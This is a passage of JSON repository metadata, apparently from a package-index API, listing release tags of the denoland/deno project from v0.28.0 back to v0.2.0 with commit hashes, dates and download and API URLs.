oland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.